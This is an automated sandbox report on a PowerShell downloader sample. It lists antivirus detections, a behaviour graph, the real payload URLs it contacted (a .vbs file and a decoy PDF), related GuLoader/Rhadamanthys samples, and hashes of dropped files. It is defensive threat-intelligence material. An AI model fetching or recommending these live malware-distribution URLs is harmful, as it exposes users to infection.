      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578230 Sample: H6epOhxoPY.ps1 Startdate: 19/12/2024 Architecture: WINDOWS Score: 84 26 x1.i.lencr.org 2->26 28 www.bluemaxxlaser.com 2->28 30 5 other IPs or domains 2->30 38 Antivirus / Scanner detection for submitted sample 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 Yara detected Powershell download and execute 2->42 44 3 other signatures 2->44 9 powershell.exe 16 23 2->9         started        13 svchost.exe 2->13         started        signatures3 process4 dnsIp5 32 www.bluemaxxlaser.com 203.175.174.69, 49707, 80 SGGS-AS-APSGGSSG Singapore 9->32 34 astenterprises.com.pk 107.161.23.150, 443, 49704 RAMNODEUS United States 9->34 46 Powershell creates an autostart link 9->46 15 powershell.exe 23 9->15         started        18 Acrobat.exe 20 61 9->18         started        20 conhost.exe 9->20         started        36 127.0.0.1 unknown unknown 13->36 signatures6 process7 signatures8 48 Loading BitLocker PowerShell Module 15->48 22 AcroCEF.exe 105 18->22         started        process9 process10 24 AcroCEF.exe 22->24         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      H6epOhxoPY.ps144%VirustotalBrowse
      H6epOhxoPY.ps134%ReversingLabsScript-PowerShell.Downloader.Boxter
      H6epOhxoPY.ps1100%AviraTR/PShell.Dldr.VPA

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://www.astacmntacmrprisacms.com.pk/ms/List%20of%20racmquiracmd%20itacmms%20and%20sacmrvicacms.p0%Avira URL Cloudsafe
      http://www.bluacmmaxxlasacmr.com/ms/ms.vbs0%Avira URL Cloudsafe
      https://www.astenterprises.com.pk/ms/List0%Avira URL Cloudsafe
      https://go.microsoft.coB30%Avira URL Cloudsafe
      http://www.microsoft.coiY0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      bg.microsoft.map.fastly.net
      		199.232.210.172
      		truefalse
        		high
        astenterprises.com.pk
        		107.161.23.150
        		truefalse
          		high
          default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
          		217.20.58.100
          		truefalse
            		high
            www.bluemaxxlaser.com
            		203.175.174.69
            		truefalse
              		high
              x1.i.lencr.org
              		unknown
              		unknownfalse
                		high
                www.astenterprises.com.pk
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.bluemaxxlaser.com/ms/ms.vbsfalse
                    		high
                    https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdffalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1774876294.000001CA6B17F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1774876294.000001CA6B2C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1543342514.0000011010070000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.7.drfalse
                          		high
                          https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1516410513.0000011001310000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://www.astenterprises.com.pk/ms/Listpowershell.exe, 00000000.00000002.1685887513.000001CA5C4D4000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.bluacmmaxxlasacmr.com/ms/ms.vbspowershell.exe, 00000000.00000002.1685887513.000001CA5B342000.00000004.00000800.00020000.00000000.sdmp, H6epOhxoPY.ps1true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://go.micropowershell.exe, 00000000.00000002.1685887513.000001CA5BD42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1516410513.0000011000902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1516410513.0000011001310000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/Licensepowershell.exe, 00000003.00000002.1543342514.0000011010070000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.microsoft.coiYpowershell.exe, 00000000.00000002.1784369442.000001CA73230000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://contoso.com/Iconpowershell.exe, 00000003.00000002.1543342514.0000011010070000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000003.00000002.1516410513.0000011001310000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://crl.ver)svchost.exe, 00000008.00000002.2706498999.00000268AD400000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://g.live.com/odclientsettings/ProdV2/C:svchost.exe, 00000008.00000003.1632205416.00000268AD210000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drfalse
                                              		high
                                              http://go.microspowershell.exe, 00000003.00000002.1516410513.0000011000902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.astenterprises.com.pkpowershell.exe, 00000000.00000002.1685887513.000001CA5CBFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://g.live.com/odclientsettings/Prod/C:edb.log.8.drfalse
                                                      		high
                                                      http://astenterprises.com.pkpowershell.exe, 00000000.00000002.1685887513.000001CA5CBFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://crl.mpowershell.exe, 00000003.00000002.1553460210.0000011073469000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1552470227.00000110733E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.astenterprises.com.pkpowershell.exe, 00000000.00000002.1685887513.000001CA5C4D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1685887513.000001CA5CBF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.astacmntacmrprisacms.com.pk/ms/List%20of%20racmquiracmd%20itacmms%20and%20sacmrvicacms.ppowershell.exe, 00000000.00000002.1685887513.000001CA5C4D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.bluemaxxlaser.compowershell.exe, 00000000.00000002.1685887513.000001CA5CC94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1685887513.000001CA5CC37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://contoso.com/powershell.exe, 00000003.00000002.1543342514.0000011010070000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://go.microsoft.coB3powershell.exe, 00000000.00000002.1781902419.000001CA7318E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1774876294.000001CA6B17F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1774876294.000001CA6B2C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1543342514.0000011010070000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://aka.ms/pscore68powershell.exe, 00000000.00000002.1685887513.000001CA5B111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1516410513.0000011000001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1685887513.000001CA5B111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1516410513.0000011000001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        203.175.174.69
                                                                        		www.bluemaxxlaser.comSingapore
                                                                        		24482SGGS-AS-APSGGSSGfalse
                                                                        107.161.23.150
                                                                        		astenterprises.com.pkUnited States
                                                                        		3842RAMNODEUSfalse

                                                                        Private

                                                                        IP
                                                                        127.0.0.1

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1578230
                                                                        Start date and time:2024-12-19 12:49:29 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 5m 43s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:18
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:H6epOhxoPY.ps1
                                                                        renamed because original name is a hash value
                                                                        Original Sample Name:94edb90db4ecf5648a2769b087acdb0323a7521877b6454fc00a6834ce4f76d6.ps1
                                                                        Detection:MAL
                                                                        Classification:mal84.evad.winPS1@20/59@5/3
                                                                        EGA Information:Failed
                                                                        HCA Information:
                                                                        • Successful, ratio: 100%
                                                                        • Number of executed functions: 8
                                                                        • Number of non-executed functions: 0
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .ps1

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 217.20.58.100, 162.159.61.3, 172.64.41.3, 23.218.208.137, 23.218.208.109, 3.233.129.217, 3.219.243.226, 52.6.155.20, 52.22.41.97, 23.195.61.56, 2.19.198.27, 23.32.239.56, 20.12.23.50, 34.237.241.83, 23.47.168.24, 13.107.246.63
                                                                        • Excluded domains from analysis (whitelisted): chrome.cloudflare-dns.com, e4578.dscg.akamaiedge.net, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                                        • Execution Graph export aborted for target powershell.exe, PID 3284 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 5708 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        06:50:30API Interceptor69x Sleep call for process: powershell.exe modified
                                                                        06:50:45API Interceptor2x Sleep call for process: svchost.exe modified
                                                                        06:50:56API Interceptor2x Sleep call for process: AcroCEF.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        203.175.174.69KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                        • www.bluemaxxlaser.com/ms/ms.vbs
                                                                        1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                        • www.bluemaxxlaser.com/ms/ms.vbs
                                                                        8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                        • www.bluemaxxlaser.com/ms/ms.vbs
                                                                        R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                        • www.bluemaxxlaser.com/ms/ms.vbs
                                                                        2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                        • www.bluemaxxlaser.com/ms/ms.vbs
                                                                        fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                        • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                                        ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                        • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                                        FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                        • www.bluemaxxlaser.com/ms/ms.vbs
                                                                        yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                        • www.bluemaxxlaser.com/ms/ms.vbs
                                                                        0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                        • www.bluemaxxlaser.com/ms/ms.vbs
                                                                        107.161.23.150KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                          1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                            8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                              R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                  tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                    FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                      yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                        0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                          List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            bg.microsoft.map.fastly.netKcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 199.232.214.172
                                                                                            1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 199.232.210.172
                                                                                            StGx54oFh6.exeGet hashmaliciousQuasarBrowse
                                                                                            • 199.232.214.172
                                                                                            8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 199.232.214.172
                                                                                            R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 199.232.210.172
                                                                                            2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 199.232.210.172
                                                                                            LFLtlBAuf7.exeGet hashmaliciousQuasarBrowse
                                                                                            • 199.232.210.172
                                                                                            FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 199.232.210.172
                                                                                            yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 199.232.214.172
                                                                                            0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 199.232.210.172
                                                                                            default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comKcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 217.20.58.100
                                                                                            1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 84.201.211.18
                                                                                            v4BET4inNV.vbsGet hashmaliciousGuLoaderBrowse
                                                                                            • 217.20.58.101
                                                                                            FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 217.20.58.100
                                                                                            t5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                            • 217.20.58.98
                                                                                            update0.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                            • 217.20.58.100
                                                                                            A file has been sent to you via DROPBOX.pdfGet hashmaliciousUnknownBrowse
                                                                                            • 217.20.58.100
                                                                                            VKJITO.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                            • 212.229.88.4
                                                                                            GV7DzNoqCI.exeGet hashmaliciousUnknownBrowse
                                                                                            • 217.20.58.100
                                                                                            99awhy8l.exeGet hashmaliciousLummaCBrowse
                                                                                            • 217.20.58.100

                                                                                            ASNs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            RAMNODEUSKcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                            • 107.161.23.150
                                                                                            FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                            • 107.161.23.150
                                                                                            SGGS-AS-APSGGSSGKcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69

                                                                                            JA3 Fingerprints

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            3b5074b1b5d032e5620f69f9f700ff0eKcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            StGx54oFh6.exeGet hashmaliciousQuasarBrowse
                                                                                            • 107.161.23.150
                                                                                            8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            1AqzGcCKey.exeGet hashmaliciousQuasarBrowse
                                                                                            • 107.161.23.150
                                                                                            v4BET4inNV.vbsGet hashmaliciousGuLoaderBrowse
                                                                                            • 107.161.23.150
                                                                                            ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1310720
                                                                                            Entropy (8bit):0.8022051807135746
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAo:RJE+Lfki1GjHwU/+vVhWqpJ
                                                                                            MD5:CD011AB0550063CA2A56959724441941
                                                                                            SHA1:BE57C31D6827952B715B0AE161DDF7BD461B8485
                                                                                            SHA-256:B05E62B6DAF8F289E26E59E1667FCDC278977E0B310E5E1115F2E10100FF8FC1
                                                                                            SHA-512:DC4BF2C5241E10CC8ED9955858B941EED94A221D898F3A720F281C5913CF8BB9A3A3CEA2B2C3480BDFDF12436FEF9F43393D68FECA36C4720F13DEB97D362FF0
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x67e88cab, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                            Category:dropped
                                                                                            Size (bytes):1048576
                                                                                            Entropy (8bit):0.9432711207507771
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:jSB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:jazaHvxXy2V2UR
                                                                                            MD5:647555000703ED92AE28F858C9B091EA
                                                                                            SHA1:BCC4A6952DB2573084A53BF3D324D636CD00C672
                                                                                            SHA-256:5240D796CAE38B914F4D83F6470E64B291268FACCA20EA1BAC3BE3BA5870AC73
                                                                                            SHA-512:393CCD91C9E4CE03E2864E045B431FD001D9BBF92A7D2174294545662FCA8F9A99A746C84DE03ACF9215CEAE191FBA01D5354930FDA5CC5A91DD22170CE79CC6
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:g.... ...............X\...;...{......................0.x...... ...{s..2...|..h.z.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{...................................*.p.2...|w.................,2,b.2...|Y..........................#......h.z.....................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:OpenPGP Public Key
                                                                                            Category:dropped
                                                                                            Size (bytes):16384
                                                                                            Entropy (8bit):0.080171769928628
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:C1KYe8JpZmql/nqlFcl1ZUllll/rJpyallGBnX/l/Tj/k7/t:C1KzopZNl/qlFclQ/lVD254
                                                                                            MD5:E2B1DA85425BDFCB424E444C30C812F7
                                                                                            SHA1:A5EF219A6091532D47B3971A9DAE28C2DE9C96DB
                                                                                            SHA-256:8DA9D9AD34BBFCE50A523C5B272FEBDD4558F903B5CC37119DC1A87DF8EA78DE
                                                                                            SHA-512:82BF841AC53F8E81F0ECC2DED1FED499F393B81E3ACD3F3A8D2058B519F4872737857C8CD5685F9D39263F450676F12F8D0797B3E8A0E5CA30C8BEBBA8E6C18E
                                                                                            Malicious:false
                                                                                            Preview:.aN......................................;...{...2...|Y.. ...{s.......... ...{s.. ...{s.P.... ...{s.................,2,b.2...|Y.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):294
                                                                                            Entropy (8bit):5.206578480674279
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7YAVq2PCHhJ2nKuAl9OmbnIFUt8OKrAgZmw+OKrAIkwOCHhJ2nKuAl9OmbjLJ:7YAVvBHAahFUt8OSAg/+OSAI56HAaSJ
                                                                                            MD5:C60DD2DD06E3F848CF091A83BAB4ADA4
                                                                                            SHA1:FC4C99B959CA374F7A4F980C78F46DC8B742658A
                                                                                            SHA-256:881E03CEE04B5A739E308D8B5E530BDB28492D8FA518AA9F1153F4ED9533DC9A
                                                                                            SHA-512:2F12F42E35943D61DFBA2006B0AAB9D3B4CFF2569717165BF6F8DBF869A904EC56DFD4174996E18A519860C776EE17443B0C9C4C59980AAA6470647CA6323D5C
                                                                                            Malicious:false
                                                                                            Preview:2024/12/19-06:50:45.499 12b4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:50:45.501 12b4 Recovering log #3.2024/12/19-06:50:45.501 12b4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):294
                                                                                            Entropy (8bit):5.206578480674279
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7YAVq2PCHhJ2nKuAl9OmbnIFUt8OKrAgZmw+OKrAIkwOCHhJ2nKuAl9OmbjLJ:7YAVvBHAahFUt8OSAg/+OSAI56HAaSJ
                                                                                            MD5:C60DD2DD06E3F848CF091A83BAB4ADA4
                                                                                            SHA1:FC4C99B959CA374F7A4F980C78F46DC8B742658A
                                                                                            SHA-256:881E03CEE04B5A739E308D8B5E530BDB28492D8FA518AA9F1153F4ED9533DC9A
                                                                                            SHA-512:2F12F42E35943D61DFBA2006B0AAB9D3B4CFF2569717165BF6F8DBF869A904EC56DFD4174996E18A519860C776EE17443B0C9C4C59980AAA6470647CA6323D5C
                                                                                            Malicious:false
                                                                                            Preview:2024/12/19-06:50:45.499 12b4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:50:45.501 12b4 Recovering log #3.2024/12/19-06:50:45.501 12b4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):335
                                                                                            Entropy (8bit):5.165775352961603
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7Vgq2PCHhJ2nKuAl9Ombzo2jMGIFUt8ODZZmw+ODzkwOCHhJ2nKuAl9Ombzo2jM4:7VgvBHAa8uFUt8Od/+Ov56HAa8RJ
                                                                                            MD5:01B17001662C1174DA7222FB775AECF1
                                                                                            SHA1:A13213AE3E55CEE9672DD946F07FF1753C06A12F
                                                                                            SHA-256:2CCAD0516A02A6F95118C064912072C2D632BF6673202308E67B474CB9D82168
                                                                                            SHA-512:5D73FC02551DE4AF767361692AEB4D0CE1BF75D457F3638C05F2E2BA1253548A60F15F12E1CE795AA6D2A4FA21DC918F29D5DC7726627E5B421A737ED221BCA1
                                                                                            Malicious:false
